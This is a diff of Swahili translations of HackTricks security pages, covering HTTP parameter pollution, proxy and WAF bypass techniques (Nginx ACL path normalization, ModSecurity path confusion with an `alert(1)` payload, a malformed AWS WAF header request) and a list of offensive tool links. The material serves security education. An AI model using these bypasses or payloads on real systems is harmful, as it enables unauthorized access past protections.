- **Flask:** Inachukua thamani ya kwanza ya parameta inayopatikana, kama vile `a=1` katika mfuatano wa utaftaji `a=1&a=2`, ikipendelea kisa cha kwanza kuliko nakala zifuatazo.
|
||||
- **PHP (kwenye Seva ya HTTP ya Apache):** Kinyume chake, inapendelea thamani ya mwisho ya parameta, ikichagua `a=2` katika mfano uliopewa. Tabia hii inaweza kwa bahati mbaya kurahisisha mashambulizi ya HPP kwa kuheshimu parameta iliyobadilishwa na mdau badala ya ile ya awali.
|
||||
|
||||
## Marejeo
|
||||
* [https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654)
|
||||
* [https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution](https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution)
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu uchomaji wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za uchomaji kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Kupitisha Kinga za Proxy / WAF
|
||||
# Kupitisha Kinga za Proksi / WAF
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -8,13 +8,17 @@ Njia nyingine za kusaidia HackTricks:
|
|||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
## Kupitisha Sheria za Nginx ACL kwa Kudhibiti Jina la Njia <a href="#heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules" id="heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules"></a>
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
## Kupitisha Sheria za ACL za Nginx kwa Kudhibiti Jina la Njia <a href="#heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules" id="heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules"></a>
|
||||
|
||||
Mbinu [kutoka kwa utafiti huu](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies).
|
||||
|
||||
|
@ -28,7 +32,7 @@ location = /admin/ {
|
|||
deny all;
|
||||
}
|
||||
```
|
||||
Kwa kuzuia upitishaji wa Nginx hufanya normalizesheni ya njia kabla ya kuichunguza. Hata hivyo, ikiwa seva ya nyuma inafanya normalizesheni tofauti (kuondoa herufi ambazo nginx haiondoi) inaweza kuwa inawezekana kuzidisha ulinzi huu.
|
||||
Kwa lengo la kuzuia njia za kuzunguka, Nginx hufanya upanuzi wa njia kabla ya kuikagua. Hata hivyo, ikiwa seva ya nyuma inafanya upanuzi tofauti (kuondoa herufi ambazo nginx haiondoi) inaweza kuwa inawezekana kuzunguka ulinzi huu.
|
||||
|
||||
### **NodeJS - Express**
|
||||
|
||||
|
@ -62,7 +66,7 @@ Kwa kuzuia upitishaji wa Nginx hufanya normalizesheni ya njia kabla ya kuichungu
|
|||
|
||||
### **PHP-FPM**
|
||||
|
||||
Mipangilio ya Nginx FPM:
|
||||
Nginx FPM configuration:
|
||||
```plaintext
|
||||
location = /admin.php {
|
||||
deny all;
|
||||
|
@ -85,16 +89,16 @@ deny all;
|
|||
|
||||
### Kupotosha Njia
|
||||
|
||||
[Katika chapisho hili](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) imeelezwa kuwa ModSecurity v3 (hadi 3.0.12), **ilitekelezwa vibaya kwa kipengele cha `REQUEST_FILENAME`** ambacho kilipaswa kuwa na njia iliyofikiwa (hadi mwanzo wa vigezo). Hii ni kwa sababu ilifanya URL decode kupata njia.\
|
||||
Kwa hivyo, ombi kama `http://example.com/foo%3f';alert(1);foo=` katika mod usalama itadhani kuwa njia ni `/foo` kwa sababu `%3f` inabadilishwa kuwa `?` ikimaliza njia ya URL, lakini kwa kweli njia ambayo seva itapokea itakuwa `/foo%3f';alert(1);foo=`.
|
||||
[Katika chapisho hili](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) imeelezwa kuwa ModSecurity v3 (hadi 3.0.12), **haikutekeleza ipasavyo kipengele cha `REQUEST_FILENAME`** ambacho kilipaswa kuwa na njia iliyofikiwa (hadi mwanzo wa vigezo). Hii ni kwa sababu ilifanya URL decode kupata njia.\
|
||||
Hivyo, ombi kama `http://example.com/foo%3f';alert(1);foo=` katika mod usalama itadhani kuwa njia ni `/foo` kwa sababu `%3f` inabadilishwa kuwa `?` ikimaliza njia ya URL, lakini kwa kweli njia ambayo seva itapokea itakuwa `/foo%3f';alert(1);foo=`.
|
||||
|
||||
Vipengele `REQUEST_BASENAME` na `PATH_INFO` pia vilikuwa vimeathiriwa na kosa hili.
|
||||
|
||||
Kitu kama hicho kilitokea katika toleo la 2 la Mod Security ambalo liliruhusu kukiuka ulinzi uliokuwa unazuia mtumiaji kupata faili zenye viendelezi maalum vinavyohusiana na faili za nakala za akiba (kama vile `.bak`) kwa kutuma tu dot URL encoded katika `%2e`, kwa mfano: `https://example.com/backup%2ebak`.
|
||||
Kitu kama hicho kilitokea katika toleo la 2 la Mod Security ambalo liliruhusu kukiuka ulinzi uliokuwa unazuia mtumiaji kupata faili zenye nyongeza maalum zinazohusiana na faili za nakala rudufu (kama vile `.bak`) kwa kutuma tu dot URL encoded katika `%2e`, kwa mfano: `https://example.com/backup%2ebak`.
|
||||
|
||||
## Kupita AWS WAF ACL <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>
|
||||
|
||||
### Kichwa Kilichoharibika
|
||||
### Kichwa Kimeharibika
|
||||
|
||||
[Utafiti huu](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) unataja kuwa ilikuwa inawezekana kukiuka sheria za AWS WAF zilizotumika kwenye vichwa vya HTTP kwa kutuma kichwa "kilichoharibika" ambacho hakikuwa kimechambuliwa ipasavyo na AWS lakini kilikuwa na seva ya nyuma.
|
||||
|
||||
|
@ -107,23 +111,28 @@ X-Query: Value\r\n
|
|||
Connection: close\r\n
|
||||
\r\n
|
||||
```
|
||||
Ilionekana kuwa inawezekana kudukua AWS WAF kwa sababu haingeweza kuelewa kuwa mstari ufuatao ni sehemu ya thamani ya kichwa wakati seva ya NODEJS ilifanya (hii ilisahihishwa).
|
||||
Ilionekana inawezekana kudukua AWS WAF kwa sababu haingeweza kuelewa kuwa mstari ufuatao ni sehemu ya thamani ya kichwa wakati server ya NODEJS ilifanya (hii ilisuluhishwa).
|
||||
|
||||
## Marejeo
|
||||
|
||||
* [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)
|
||||
* [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass)
|
||||
* [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)
|
||||
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,17 +1,21 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
# Timu ya Bluu
|
||||
|
||||
|
@ -40,7 +44,7 @@ Njia nyingine za kusaidia HackTricks:
|
|||
* [https://builtwith.com/](https://builtwith.com)
|
||||
* [https://www.spiderfoot.net/](https://www.spiderfoot.net)
|
||||
* [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks)
|
||||
* [https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/sys/tools/subdomainfinder/) : Zana 8 za kutafuta subdomain, sublist3r, amass na zaidi
|
||||
* [https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/sys/tools/subdomainfinder/) : Zana 8 za kutafuta Subdomain, sublist3r, amass na zaidi
|
||||
|
||||
# **WEB**
|
||||
|
||||
|
@ -49,44 +53,44 @@ Njia nyingine za kusaidia HackTricks:
|
|||
* [https://github.com/hahwul/XSpear](https://github.com/hahwul/XSpear)
|
||||
* [https://github.com/BitTheByte/Monitorizer/](https://github.com/BitTheByte/Monitorizer/)
|
||||
* [https://github.com/spinkham/skipfish](https://github.com/spinkham/skipfish)
|
||||
* [https://github.com/blark/aiodnsbrute](https://github.com/blark/aiodnsbrute) : Tafuta majina ya kikoa kwa nguvu kwa njia isiyo ya kawaida
|
||||
* [https://crt.sh/?q=%.yahoo.com](https://crt.sh/?q=%.yahoo.com) : Uchunguzi wa subdomain
|
||||
* [https://github.com/blark/aiodnsbrute](https://github.com/blark/aiodnsbrute) : Kuvunja jina la kikoa kwa njia isiyo ya kawaida
|
||||
* [https://crt.sh/?q=%.yahoo.com](https://crt.sh/?q=%.yahoo.com) : Kuvunja jina la kikoa la Subdomain
|
||||
* [https://github.com/tomnomnom/httprobe](https://github.com/tomnomnom/httprobe): Angalia ikiwa seva za wavuti katika kikoa zinapatikana
|
||||
* [https://github.com/aboul3la/Sublist3r](https://github.com/aboul3la/Sublist3r) : Ugunduzi wa subdomain
|
||||
* [https://github.com/gwen001/github-search/blob/master/github-subdomains.py](https://github.com/gwen001/github-search/blob/master/github-subdomains.py) : Ugunduzi wa subdomain kwenye github
|
||||
* [https://github.com/aboul3la/Sublist3r](https://github.com/aboul3la/Sublist3r) : Ugunduzi wa Subdomain
|
||||
* [https://github.com/gwen001/github-search/blob/master/github-subdomains.py](https://github.com/gwen001/github-search/blob/master/github-subdomains.py) : Ugunduzi wa Subdomain kwenye github
|
||||
* [https://github.com/robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) : Uchunguzi wa haraka wa bandari
|
||||
* [https://github.com/Threezh1/JSFinder](https://github.com/Threezh1/JSFinder) : Subdomains na URLs kutoka kwenye faili za JS kwenye wavuti
|
||||
* [https://github.com/C1h2e1/MyFuzzingDict](https://github.com/C1h2e1/MyFuzzingDict) : Kamusi ya faili za wavuti
|
||||
* [https://github.com/TypeError/Bookmarks/blob/master/README.md](https://github.com/TypeError/Bookmarks/blob/master/README.md) : BurpExtension ya kuepuka vichupo vingi vya repeater
|
||||
* [https://github.com/C1h2e1/MyFuzzingDict](https://github.com/C1h2e1/MyFuzzingDict) : Kamusi ya faili za Wavuti
|
||||
* [https://github.com/TypeError/Bookmarks/blob/master/README.md](https://github.com/TypeError/Bookmarks/blob/master/README.md) : BurpExtension kuepuka vichupo vingi vya kurudia
|
||||
* [https://github.com/hakluke/hakrawler](https://github.com/hakluke/hakrawler) : Pata mali
|
||||
* [https://github.com/izo30/google-dorker](https://github.com/izo30/google-dorker) : Google dorks
|
||||
* [https://github.com/sehno/Bug-bounty/blob/master/bugbounty\_checklist.md](https://github.com/sehno/Bug-bounty/blob/master/bugbounty\_checklist.md) : Orodha ya BugBounty ya Wavuti
|
||||
* [https://github.com/Naategh/dom-red](https://github.com/Naategh/dom-red) : Angalia orodha ya kikoa dhidi ya Uelekezaji Mbadala wa Wazi
|
||||
* [https://github.com/prodigysml/Dr.-Watson](https://github.com/prodigysml/Dr.-Watson) : Programu-jalizi ya Burp, uchambuzi wa nje ya mtandao ili kugundua kikoa, subdomain na IPs
|
||||
* [https://github.com/Naategh/dom-red](https://github.com/Naategh/dom-red) : Angalia orodha ya kikoa dhidi ya Uelekezaji wa Wazi
|
||||
* [https://github.com/prodigysml/Dr.-Watson](https://github.com/prodigysml/Dr.-Watson) : Programu-jalizi ya Burp, uchambuzi wa nje ili kugundua vikoa, subdomains na IPs
|
||||
* [https://github.com/hahwul/WebHackersWeapons](https://github.com/hahwul/WebHackersWeapons): Orodha ya zana tofauti
|
||||
* [https://github.com/gauravnarwani97/Trishul](https://github.com/gauravnarwani97/Trishul) : Programu-jalizi ya BurpSuite kutafuta udhaifu (SQLi, XSS, SSTI)
|
||||
* [https://github.com/gauravnarwani97/Trishul](https://github.com/gauravnarwani97/Trishul) : Programu-jalizi ya BurpSuite kugundua udhaifu (SQLi, XSS, SSTI)
|
||||
* [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker) : Kifaa cha Chrome cha kufuatilia kazi za ujumbe wa baada
|
||||
* [https://github.com/Quitten/Autorize](https://github.com/Quitten/Autorize) : Jaribio la otomatiki la uwakiki wa kitambulisho (ondoa vidakuzi na jaribu kutuma ombi)
|
||||
* [https://github.com/pikpikcu/xrcross](https://github.com/pikpikcu/xrcross): XRCross ni Zana ya Ujenzi, Scanner, na zana ya kupenya / Jaribio la BugBounty. Zana hii ilijengwa kwa jaribio (XSS|SSRF|CORS|SSTI|IDOR|RCE|LFI|SQLI) vulnerabilities
|
||||
* [https://github.com/Quitten/Autorize](https://github.com/Quitten/Autorize) : Vipimo vya kiotomatiki vya uthibitishaji (ondoa vidakuzi na jaribu kutuma ombi)
|
||||
* [https://github.com/pikpikcu/xrcross](https://github.com/pikpikcu/xrcross): XRCross ni Zana ya Ujenzi, Scanner, na zana ya upenyezi / Jaribio la BugBounty. Zana hii ilijengwa kwa ajili ya kujaribu (XSS|SSRF|CORS|SSTI|IDOR|RCE|LFI|SQLI) vulnerabilities
|
||||
# Windows
|
||||
|
||||
* [https://github.com/Mr-Un1k0d3r/PoisonHandler](https://github.com/Mr-Un1k0d3r/PoisonHandler) : Harakisha za pembeni
|
||||
* [https://github.com/Mr-Un1k0d3r/PoisonHandler](https://github.com/Mr-Un1k0d3r/PoisonHandler) : Harakati za upande
|
||||
* [https://freddiebarrsmith.com/trix/trix.html](https://freddiebarrsmith.com/trix/trix.html) : LOL bins
|
||||
* [https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79](https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79) ([https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)): Uthabiti
|
||||
* [https://github.com/odzhan/injection](https://github.com/odzhan/injection) : Mbinu za Kuingiza Mchakato wa Windows
|
||||
* [https://github.com/BankSecurity/Red\_Team](https://github.com/BankSecurity/Red\_Team) : Skrini za Timu Nyekundu
|
||||
* [https://github.com/l0ss/Grouper2](https://github.com/l0ss/Grouper2) : tafuta makosa yanayohusiana na usanidi wa usalama katika Sera ya Kikundi cha Active Directory.
|
||||
* [https://github.com/BankSecurity/Red\_Team](https://github.com/BankSecurity/Red\_Team) : Skripti za Timu Nyekundu
|
||||
* [https://github.com/l0ss/Grouper2](https://github.com/l0ss/Grouper2) : pata upangishaji wa usalama unaohusiana katika Sera ya Kikundi cha Active Directory.
|
||||
* [https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring](https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring) : Ufichaji wa Securestring
|
||||
* [https://pentestlab.blog/2020/02/24/parent-pid-spoofing/](https://pentestlab.blog/2020/02/24/parent-pid-spoofing/) : Ughushi wa PID ya Wazazi
|
||||
* [https://github.com/the-xentropy/xencrypt](https://github.com/the-xentropy/xencrypt) : Ficha malipo ya Powershell
|
||||
* [https://pentestlab.blog/2020/02/24/parent-pid-spoofing/](https://pentestlab.blog/2020/02/24/parent-pid-spoofing/) : Udukuzi wa PID ya Wazazi
|
||||
* [https://github.com/the-xentropy/xencrypt](https://github.com/the-xentropy/xencrypt) : Ficha Malipo ya Powershell
|
||||
* [https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/](https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/) : C2 ya Kujificha
|
||||
* [https://windows-internals.com/faxing-your-way-to-system/](https://windows-internals.com/faxing-your-way-to-system/) : Mfululizo wa magogo kuhusu Windows Internals
|
||||
* [https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/](https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/) : Fuatilia nani anafungua hati
|
||||
* [https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet](https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet) : Karatasi ya Kudanganya ya Uchunguzi wa Active Directory
|
||||
* [https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/](https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/) : Fuatilia nani amefungua hati
|
||||
* [https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet](https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet) : Karatasi ya Udukuzi wa Active Directory
|
||||
|
||||
# Firmware
|
||||
|
||||
Zana ambazo ninaona zinaweza kuwa nzuri kwa uchambuzi wa firmware (kwa moja kwa moja):
|
||||
Zana ambazo ninaona zinaweza kuwa nzuri kwa uchambuzi wa firmware (za moja kwa moja):
|
||||
|
||||
* [https://github.com/craigz28/firmwalker](https://github.com/craigz28/firmwalker)
|
||||
* [https://github.com/fkie-cad/FACT\_core](https://github.com/fkie-cad/FACT\_core)
|
||||
|
@ -97,13 +101,13 @@ Baada ya kumaliza:
|
|||
* [https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html](https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html)
|
||||
* [https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html](https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html)
|
||||
|
||||
Jinsi ya kutoa firmware ikiwa hatuipati mkondoni: [https://www.youtube.com/watch?v=Kxvpbu9STU4](https://www.youtube.com/watch?v=Kxvpbu9STU4)
|
||||
Jinsi ya kutoa firmware ikiwa hatuipati mtandaoni: [https://www.youtube.com/watch?v=Kxvpbu9STU4](https://www.youtube.com/watch?v=Kxvpbu9STU4)
|
||||
|
||||
Hapa kuna firmware na udhaifu wa kuchambua: [https://github.com/scriptingxss/IoTGoat](https://github.com/scriptingxss/IoTGoat)
|
||||
Hapa kuna firmware yenye mapungufu ya usalama ya kuchambua: [https://github.com/scriptingxss/IoTGoat](https://github.com/scriptingxss/IoTGoat)
|
||||
|
||||
na hapa ni metodolojia ya owasp ya kuchambua firmware: [https://github.com/scriptingxss/owasp-fstm](https://github.com/scriptingxss/owasp-fstm)
|
||||
na hapa kuna mbinu ya owasp ya kuchambua firmware: [https://github.com/scriptingxss/owasp-fstm](https://github.com/scriptingxss/owasp-fstm)
|
||||
|
||||
Uigaji wa Firmware: FIRMADYNE (https://github.com/firmadyne/firmadyne/) ni jukwaa la kiotomatiki la uigaji na uchambuzi wa kina wa firmware ya Linux.
|
||||
Uigaji wa Firmware: FIRMADYNE (https://github.com/firmadyne/firmadyne/) ni jukwaa la kiotomatiki la uigaji na uchambuzi wa kina wa firmware za Linux.
|
||||
|
||||
# NYINGINE
|
||||
|
||||
|
@ -111,22 +115,37 @@ Uigaji wa Firmware: FIRMADYNE (https://github.com/firmadyne/firmadyne/) ni jukwa
|
|||
* [https://github.com/weev3/LKWA](https://github.com/weev3/LKWA)
|
||||
* [https://h0mbre.github.io/Learn-C-By-Creating-A-Rootkit/](https://h0mbre.github.io/Learn-C-By-Creating-A-Rootkit/)
|
||||
* [https://github.com/skelsec/jackdaw](https://github.com/skelsec/jackdaw)
|
||||
* [https://github.com/CoatiSoftware/Sourcetrail](https://github.com/CoatiSoftware/Sourcetrail) : Uchambuzi wa Kanuni ya Statis
|
||||
* [https://github.com/CoatiSoftware/Sourcetrail](https://github.com/CoatiSoftware/Sourcetrail) : Uchambuzi wa Kanuni za Statisiki
|
||||
* [https://www.hackerdecabecera.com/2019/12/blectf-capture-flag-en-formato-hardware.html](https://www.hackerdecabecera.com/2019/12/blectf-capture-flag-en-formato-hardware.html) : Bluetooth LE CTF
|
||||
* [https://github.com/skeeto/endlessh](https://github.com/skeeto/endlessh) : Tarpit ya SSH ambayo inatuma bango lisilokoma polepole.
|
||||
* [https://github.com/skeeto/endlessh](https://github.com/skeeto/endlessh) : Tarpit ya SSH ambayo inatuma bango lisiloisha polepole.
|
||||
* Zana za AWS na Cloud: [https://github.com/toniblyx/my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools)
|
||||
* IFS (Interplanetary File System) kwa ajili ya phising: [https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/)
|
||||
* IFS (Interplanetary File System) kwa ajili ya kudanganya: [https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/)
|
||||
* Huduma za mzunguko wa IP: [https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212](https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212)
|
||||
* Rootkit ya Linux: [https://github.com/aesophor/satanic-rootkit](https://github.com/aesophor/satanic-rootkit)
|
||||
